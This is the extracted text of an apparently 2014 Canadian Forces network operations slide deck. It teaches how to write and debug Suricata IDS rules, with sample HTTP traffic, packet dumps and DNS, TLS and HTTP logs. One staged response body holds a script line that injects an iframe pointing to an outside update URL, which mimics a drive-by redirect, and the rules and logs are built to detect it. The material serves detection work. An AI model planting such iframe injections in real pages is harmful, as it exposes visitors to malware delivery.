canadian forces network operations centre( cfnoc) centre d’operations des reseaux des force...

CANADIAN FORCES NETWORK OPERATIONS CENTRE( CFNOC) CENTRE D’OPERATIONS DES RESEAUX DES FORCE CANADIANNE (CORFC)

UNCLAS

UNCLAS

Hakuna Suricata(it means no worries, except for APT)

LS PulsiferSurveillance Analyst5 May 2014


UNCLAS

UNCLAS

Outline

• IDS Overview• First Thoughts• Rules of the Jungle

a. HTTP GETb. HTTP 200 OK

• BONUS ROUND!• Conclusion


UNCLAS

UNCLAS

First Thoughts

1. Easy SetupA. 1400 (w/ comments) line configB. ET rules out of the boxC. Rule management?

2. TURN ON ALL THE THINGS!3. Output format(s)4. Fancy-lookin' rules


UNCLAS

UNCLAS

Rules of the Jungle

# PULSIFER.CA / CATS TEST HTTP RULEalert http $HOME_NET any -> $EXTERNAL_NET any (msg:"THE INTERNET WANTS CATS"; content:"GET"; http_method; content:"/cats.html"; http_uri; content:"pulsifer.ca"; http_header; content:”Windows NT 6.1”; http_user_agent; urilen:<11; classtype:bad-unknown; sid:5000001; rev:1;)

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"THE INTERNET GOT CATS"; content:"200"; http_stat_code; content:"OK"; http_stat_msg; content:"iframe src"; http_server_body; classtype:bad-unknown; sid:5000000; rev:1;)


UNCLAS

UNCLAS

First Rule of the Junglealert http $HOME_NET any -> $EXTERNAL_NET any (msg:"THE INTERNET WANTS CATS"; content:"GET"; http_method; content:"/cats.html"; http_uri; content:"pulsifer.ca"; http_header; content:”Windows NT 6.1”; http_user_agent; urilen:<11; classtype:bad-unknown; sid:5000001; rev:1;)

GET /cats.html HTTP/1.1

Host: pulsifer.ca

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive


UNCLAS

UNCLAS

Debug cont.. PACKET:

0000 00 0C 29 DD B4 57 C8 60 00 CB 92 D9 08 00 45 00 ..)..W.` ......E.

0010 00 28 1E DF 40 00 80 06 50 7F 0A 0D 25 01 43 E7 .(..@... P...%.C.

0020 18 7D B3 A1 00 50 80 F4 76 B0 3A F1 3C 4A 50 10 .}...P.. v.:.<JP.

0030 00 FE 00 93 00 00 00 00 00 00 00 00 ........ ....

ALERT CNT: 1

ALERT MSG [00]: THE INTERNET WANTS CATS

ALERT GID [00]: 1

ALERT SID [00]: 5000001

ALERT REV [00]: 1

ALERT CLASS [00]: Potentially Bad Traffic

ALERT PRIO [00]: 2

ALERT FOUND IN [00]: STATE

ALERT IN TX [00]: 0

STREAM DATA LEN: 294

STREAM DATA:

...


UNCLAS

UNCLAS

Second Rule of the Junglealert http $EXTERNAL_NET any -> $HOME_NET any (msg:"THE INTERNET GOT CATS"; content:"200"; http_stat_code; content:"OK"; http_stat_msg; content:"iframe src"; http_server_body; classtype:bad-unknown; sid:5000000; rev:1;)

HTTP/1.1 200 OK

Date: Tue, 06 May 2014 02:12:05 GMT

...

<!DOCTYPE html>

<html>

<body>

<script>

document.write('<iframe src="http://mjner.com/update/"></iframe>');

...


UNCLAS

UNCLAS

First Rule DebugTIME: 05/05/2014-22:12:06.264225

PCAP PKT NUM: 8

PKT SRC: wire/pcap

SRC IP: 10.13.37.1

DST IP: 67.231.24.125

PROTO: 6

SRC PORT: 45985

DST PORT: 80

TCP SEQ: 2163504816

TCP ACK: 988888138

FLOW: to_server: TRUE, to_client: FALSE

FLOW Start TS: 05/05/2014-22:12:06.232835

FLOW IPONLY SET: TOSERVER: TRUE, TOCLIENT: TRUE

FLOW ACTION: DROP: FALSE

FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE

FLOW APP_LAYER: DETECTED: TRUE, PROTO 1

FLOWBIT: ET.http.driveby.redkit.uri

PACKET LEN: 60


UNCLAS

UNCLAS

Bonus Round! GUESS THE META!

05/05/2014-20:13:27.852789 [**] Query TX 214c [**] pulsifer.ca [**] A [**] 10.13.37.1:50922 -> 10.0.0.5:53

05/05/2014-20:13:27.852789 [**] Response TX 214c [**] Recursion Desired [**] 10.0.0.5:53 -> 10.13.37.1:50922

05/05/2014-20:13:27.852789 [**] Response TX 214c [**] pulsifer.ca [**] A [**] TTL 12128 [**] 67.231.24.125 [**] 10.0.0.5:53 -> 10.13.37.1:50922

05/05/2014-20:50:35.379305 172.16.0.10:38457 -> 67.231.24.125:993 TLS: Subject='serialNumber=tsWwnNhDJVx2sppFUBFdevYswWWbQOPg, OU=GT90807209, OU=See www.rapidssl.com/resources/cps (c)14, OU=Domain Control Validated - RapidSSL(R), CN=pulsifer.ca' Issuerdn='C=US, O=GeoTrust, Inc., CN=RapidSSL CA' SHA1='d1:0b:df:ca:39:a9:dc:50:79:cb:73:d0:0b:10:84:e9:92:e8:2d:fd' VERSION='TLSv1'

05/05/2014-20:13:27.921584 pulsifer.ca [**] /cats.html [**] Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 [**] <no referer> [**] GET [**] HTTP/1.1 [**] 200 [**] 156 bytes [**] 10.13.37.1:44739 -> 67.231.24.125:80

05/05/2014-20:13:28.259719 mjner.com [**] /update/ [**] Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 [**] https://pulsifer.ca/cats.html [**] GET [**] HTTP/1.1 [**] 200 [**] 1123 bytes [**] 10.13.37.1:44740 -> 100.42.50.110:80


UNCLAS

UNCLAS

Conclusion


UNCLAS

UNCLAS

canadian forces network operations centre( cfnoc) centre d’operations des reseaux des force...

Documents